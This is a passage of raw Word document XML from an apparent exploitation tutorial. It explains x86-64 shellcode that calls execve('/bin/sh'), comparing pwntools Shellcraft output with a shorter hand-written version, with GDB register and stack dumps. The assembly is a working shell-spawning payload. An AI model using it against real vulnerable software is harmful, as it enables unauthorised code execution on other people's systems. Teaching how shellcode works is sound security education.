      <w:tr w:rsidR="00847435" w14:paraId="0C8BBA65" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="1043"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="43D1D2F4" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>/* push b'/bin///sh\x00' */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6396AEB5" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>push 0x68</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B94E51" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>mov rax, 0x732f2f2f6e69622f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DFE36DE" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>push rax</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="677A5CB3" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Push PATH Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C433F14" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The code pushes the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> array separately by pushing </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>b'sh'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> followed by a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> terminator.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4135"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="3941A4B3" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="1043"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1AD7CC5E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>/* push b'sh\x00' */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63C7ED6A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>push 0x1010101 ^ 0x6873</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07EBEF5A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>xor dword ptr [rsp], 0x1010101</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0149FC22" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>xor esi, esi /* 0 */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E5A4CD1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>push rsi /* null terminate */</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="265843E7" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Push Argv Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2331C10C" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">Then, it increases the stack pointer by the length of </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>b'/bin///sh\x00'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and saves the result in </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rsi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so that </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rsi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> points to the new data. The code pushes the value of </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rsi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> onto the stack and sets </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rsi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> equal to </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4135"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="08E8E6D2" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="1043"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="46C7B1D1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>push 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75FD6B33" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>pop rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16068049" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>add rsi, rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="127434A2" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>push rsi /* 'sh\x00' */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F13E29A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>mov rsi, rsp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69EBB498" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Pointer Math</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127C0ECD" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">Finally, the code calls </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r>
        <w:t>, opening a system shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C50914F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Shellcraft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> code pushes similar values onto the stack twice. To shrink the size of the shellcode, it may be possible to set the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pointer so that it points to part of the data already on the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E35E6F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">This piece of shellcode starts by clearing </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rsi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and pushing a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> terminator to the stack.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3235"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="11096179" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="530"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3235" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="22AAC741" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>xor rsi,rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CAAD711" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>push rsi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FED1E93" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Push NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BAA90C" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">Then, the code pushes </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>b'/bin//sh'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the stack.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3235"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="42734E19" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="530"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3235" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="31F3FB51" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>mov rdi,0x68732f2f6e69622f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77FD109D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>push rdi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C87E0AF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Push Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C37DFA" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">At this point, </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>b'/bin//sh'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is at the top of the stack and visible in some of the program registers.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7555"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="3DFB6088" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="1223"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5DC4C8F1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x7fffffffddd0:                 xor    rsi,rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="615DBFAF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x7fffffffddd3                  push   rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648F7942" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x7fffffffddd4                  movabs rdi, 0x68732f2f6e69622f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F2BCD43" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x7fffffffddde                  push   rdi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E6E7FF1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>●→ 0x7fffffffdddf                  push   rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="702F4373" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="603B7934" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$rsp   : 0x00007fffffffddf0  →  "/bin//sh"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A5A56B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$rsi   : 0x0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C7D86E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$rdi   : 0x68732f2f6e69622f ("/bin//sh"?)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AC6D6A5" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="292533E3" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>stack ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13444AEF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddf0│+0x0000: "/bin//sh"     ← $rsp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FB3139A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Debugger Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4403DEC0" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">Next, the program pushes the stack pointer, which points to </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>b'/bin//sh'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, onto the stack to be saved in </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="395EEEBA" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="1223"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="6385437D" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="0087746D" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x7fffffffdddf                  </w:t>
            </w:r>
            <w:r w:rsidRPr="0087746D">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>push   rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A7B0727" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x7fffffffdde0                  pop    rdi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CCE167F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>●→ 0x7fffffffdde1                  push   0x3b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7941C9DE" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6BEA51A4" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> registers ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="174AF47F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$rax   : 0x0               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31925F9D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$rsp   : 0x00007fffffffddf0  →  "/bin//sh"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="576ADBB5" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$rsi   : 0x0               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="397B8825" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$rdi   : 0x00007fffffffddf0  →  "/bin//sh"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5322C1AA" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="776C88DF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>stack ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19CBC55B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x00007fffffffddf0│+0x0000: </w:t>
            </w:r>
            <w:r w:rsidRPr="0087746D">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>"/bin//sh"     ← $rsp, $rdi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09F93808" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Debugger Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E731F2" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1873DCBF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Finally, it pushes the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>syscall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> number for </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (59) to the stack before calling </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3BAD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>syscall</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="7F97A524" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="1223"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2FE837F8" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x7fffffffdde1                  </w:t>
            </w:r>
            <w:r w:rsidRPr="0087746D">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>push   0x3b</w:t>
            </w:r>
          </w:p>
